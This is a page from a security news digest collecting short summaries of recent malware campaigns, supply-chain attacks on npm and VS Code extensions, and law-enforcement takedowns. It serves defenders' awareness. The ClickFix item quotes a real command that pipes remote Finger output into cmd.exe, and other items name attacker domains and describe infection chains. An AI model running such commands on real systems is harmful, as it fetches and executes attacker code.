< ciso
brief />
Tag Banner

All news with #malware tag

901 articles · page 33 of 46

Validating Chrome Extensions: Organizational Security

🔒 This article by Stan Kaminsky reviews Athanasios Giatsos’ Security Analyst Summit 2025 talk and explains why malicious browser extensions are a major blind spot for organizations. It outlines how extensions can access cookies, local storage, proxy settings, clipboard and screen capture, enabling session and account theft, espionage, ad fraud and crypto theft, and why Manifest V3 reduces but does not eliminate risk. Practical controls described include formal extension policies and allowlists, disabling developer mode, version pinning and testing of updates, EDR and SIEM-based monitoring, and the use of specialized vetting tools for deeper analysis.
read more →

npm Malware Campaign Redirects Visitors to Fake Crypto Sites

🛡️ Researchers from the Socket Threat Research Team uncovered a new npm malware campaign operated by threat actor dino_reborn, distributed across seven packages that executed immediately and fingerprinted visitors. The packages used Adspect proxying and cloaking to distinguish researchers from victims, delivering branded fake CAPTCHAs and dynamic redirects to malicious crypto sites. Anti-analysis measures disabled developer tools and user interactions to hinder inspection.
read more →

AWS Transfer Family Terraform Module Adds Malware Scanning

🛡️ AWS has updated the Transfer Family Terraform module to support automated malware scanning workflows for files transferred to S3. The module provisions GuardDuty S3 Protection–based scan pipelines, dynamic routing based on results, and threat notifications in a single deployment. It preserves folder structure, allows granular S3 prefix targeting, and helps ensure only verified clean files reach applications and data lakes.
read more →

AI-Enhanced Tuoni Framework Targets US Real Estate Firm

🔍 Morphisec observed an AI-enhanced intrusion in October 2025 that targeted a major US real estate firm using the modular Tuoni C2 framework. The campaign began with a Microsoft Teams impersonation and a PowerShell one-liner that spawned a hidden process to retrieve a secondary script. That loader downloaded a BMP file and used least significant bit steganography to extract shellcode, executing it entirely in memory and reflectively loading TuoniAgent.dll. Researchers noted AI-generated code patterns and an encoded configuration pointing to two C2 servers; Morphisec's AMTD prevented execution.
read more →

Malicious npm Packages Use Adspect to Cloak Crypto Scams

⚠️Seven npm packages published under the developer name 'dino_reborn' were found leveraging the cloud-based Adspect service to distinguish researchers from potential victims and redirect targeted users to cryptocurrency scam pages. Socket's analysis shows six packages include a ~39 KB cloaking script that fingerprints visitors, employs anti-analysis controls, and forwards data to an actor-controlled proxy and the Adspect API. Targets are redirected to deceptive Ethereum and Solana-branded CAPTCHA pages, while likely researchers are shown a benign Offlido-style decoy.
read more →

EVALUSION ClickFix Campaign Delivers Amatera, NetSupport

🔒 Researchers identified a ClickFix-based EVALUSION campaign deploying Amatera Stealer and NetSupport RAT, observed in November 2025. The campaign abuses the Windows Run dialog and mshta.exe to launch a PowerShell script that downloads a .NET DLL hosted on MediaFire; the Amatera DLL, packed with PureCrypter, is injected into MSBuild.exe to exfiltrate data. eSentire highlights Amatera's WoW64 SysCalls evasion and conditional NetSupport deployment when domain membership or valuable files are detected.
read more →

Job-test malware campaign shifts to public JSON dropboxes

🔎 The Contagious Interview campaign is delivering trojanized coding tests that fetch heavily obfuscated JavaScript from public JSON-storage services such as JSON Keeper, JSONSilo, and npoint.io. When executed in a Node.js test run the payloads decode and install the BeaverTail infostealer and then stage the InvisibleFerret RAT. NVISO Labs warns attackers are abusing developer trust and legitimate platforms and recommends sandboxing, auditing config files, and blocking suspicious outbound requests.
read more →

Dragon Breath Deploys RONINGLOADER to Deliver Gh0st RAT

🔒 Elastic Security Labs and Unit 42 describe a China‑focused campaign in which the actor Dragon Breath uses a multi‑stage loader named RONINGLOADER to deliver a modified Gh0st RAT. The attack leverages trojanized NSIS installers that drop two embedded packages—one benign and one stealthy—to load a DLL and an encrypted tp.png file containing shellcode. The loader employs signed drivers, WDAC tampering, and Protected Process Light abuse to neutralise endpoint protections popular in the Chinese market before injecting a persistent high‑privilege backdoor.
read more →

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.
read more →

Massive npm Worm Floods Registry to Harvest Tea Tokens

🔥 A coordinated worm is flooding the npm registry with packages designed to steal tokens from developers using the Tea Protocol, researchers say. Amazon and Sonatype report the campaign has expanded to roughly 153,000 packages, up from about 15,000 a year ago. While Tea tokens currently lack monetary value, experts warn threat actors could pivot to deliver malware or monetize rewards when Mainnet launches. Repositories and IT teams are urged to tighten access controls and deploy advanced detection.
read more →

IndonesianFoods worm floods npm registry with spam packages

🔍 Security researchers have uncovered a large-scale, worm-like campaign targeting the npm registry. Dubbed IndonesianFoods, the operation has run for over two years and uses at least 11 npm accounts to publish tens of thousands of spam packages. Each package contains an auto.js or publishScript.js script that, when executed, forces packages public, randomizes versions and self-publishes in a loop. Endor Labs warns a single execution can produce ~12 packages per minute and the packages interlink as dependencies, creating exponential spread, registry strain and substantial supply-chain risk.
read more →

Fake Chrome Extension 'Safery' Exfiltrates Ethereum Seeds

🔒 A malicious Chrome extension posing as Safery: Ethereum Wallet was found to exfiltrate Ethereum wallet seed phrases by encoding mnemonics into synthetic Sui addresses. Socket security researcher Kirill Boychenko and Koi Security report the extension broadcasts micro-transactions (0.000001 SUI) from an attacker-controlled wallet to smuggle seed phrases on-chain without a traditional C2 server. Uploaded on September 29, 2025 and updated November 12, it remained available at the time of reporting. Users should stick to trusted wallet extensions and defenders should flag unexpected RPC calls and on-chain writes during wallet import or creation.
read more →

Android photo frames download malware at boot, supply risk

⚠️ Quokka's assessment of the Uhale Android platform used in many consumer digital picture frames found devices that download and execute malware on boot. The tested units update to Uhale app 4.2.0, install a JAR/DEX payload from China-based servers, and persistently load it at every reboot. Devices were rooted, shipped with SELinux disabled and signed with AOSP test-keys, increasing exposure. Quokka disclosed 17 vulnerabilities (11 with CVEs) including remote code execution, command injection, an unauthenticated file server and insecure WebViews; researchers linked artifacts to Vo1d and Mezmess while the vendor did not respond to notifications.
read more →

Operation Endgame 3.0 Disrupts Three Major Malware Networks

🔒 Operation Endgame 3.0 targeted and dismantled infrastructure supporting three prominent malware families — Rhadamanthys, VenomRAT and the Elysium botnet — in coordinated actions carried out between 10 and 13 November. Authorities disrupted or seized more than 1,025 servers and 20 domains, searched 11 locations across multiple countries and arrested a suspected VenomRAT operator in Greece. The initiative was led by Europol with Eurojust, national law enforcement partners and over 30 private cybersecurity organizations.
read more →

Operation Endgame Takedown Disrupts Major Malware Campaign

🛡️ Investigators disrupted the infrastructure for the Rhadamanthys credential stealer and targeted the VenomRAT remote‑access trojan as part of Operation Endgame. Authorities secured data linked to more than 650,000 victims and published it on information platforms so people can verify exposure. A suspect was arrested in Greece, 11 premises were searched and over $200 million in cryptocurrency assets were frozen.
read more →

Over 46,000 Fake npm Packages Flood Registry Since 2024

📦 Researchers warn a large-scale spam campaign has flooded the npm registry with over 46,000 fake packages since early 2024, a coordinated, long-lived effort dubbed IndonesianFoods. The packages harbor a dormant worm in a single JavaScript file that only runs if a user manually executes commands like node auto.js, enabling automated self-publishing of thousands of junk packages. The campaign appears designed to waste registry resources, pollute search results, and possibly monetize via the Tea protocol; GitHub says it has removed the offending packages.
read more →

DanaBot Malware Returns Targeting Windows After Disruption

🔁 Zscaler ThreatLabz has observed a new DanaBot variant (v669) returning to Windows systems after a six-month disruption caused by Operation Endgame. The rebuilt command-and-control infrastructure uses Tor .onion domains and 'backconnect' nodes, and operators are collecting stolen funds via multiple cryptocurrency addresses (BTC, ETH, LTC, TRX). Organizations should add Zscaler's IoCs to blocklists, update detection tools, and harden email and web defenses against malspam, SEO poisoning, and malvertising.
read more →

Maverick Banking Malware Spreads via WhatsApp Web in Brazil

⚠️ Threat hunters report a .NET banking trojan dubbed Maverick propagating via WhatsApp Web, with analyses noting significant code overlaps with the Coyote family and attribution to the actor known as Water Saci. The campaign uses a self-propagating component named SORVEPOTEL to distribute a ZIP containing an LNK that launches PowerShell/cmd to fetch loaders from zapgrande[.]com. The loader installs modules only after geo/linguistic checks confirm the victim is in Brazil and then deploys banking-targeted credential-stealing and web-injection capabilities.
read more →

GootLoader Returns Using Custom Font to Conceal Payload

🔍 Huntress observed the return of GootLoader infections beginning October 27, 2025, with two cases leading to hands-on keyboard intrusions and domain controller compromise within 17 hours. The loader now embeds a custom WOFF2 font using Z85 encoding to substitute glyphs and render obfuscated filenames readable only in the victim browser. Actors deliver XOR-encrypted ZIPs via compromised WordPress comment endpoints and SEO-poisoned search results, and the archive is crafted to appear as benign text to many automated analysis tools while extracting a JavaScript payload on Windows.
read more →

GlassWorm Resurfaces in VS Code Extensions and GitHub

🐛 Researchers have found a renewed wave of the GlassWorm supply-chain worm targeting Visual Studio Code extensions and GitHub repositories after it was previously declared contained. The malware hides JavaScript payloads in undisplayable Unicode characters, making malicious code invisible in editors, and uses blockchain memos on Solana to publish remote C2 endpoints. Koi researchers identified three newly compromised OpenVSX extensions and observed credential theft and AI-styled commits used to propagate the worm.
read more →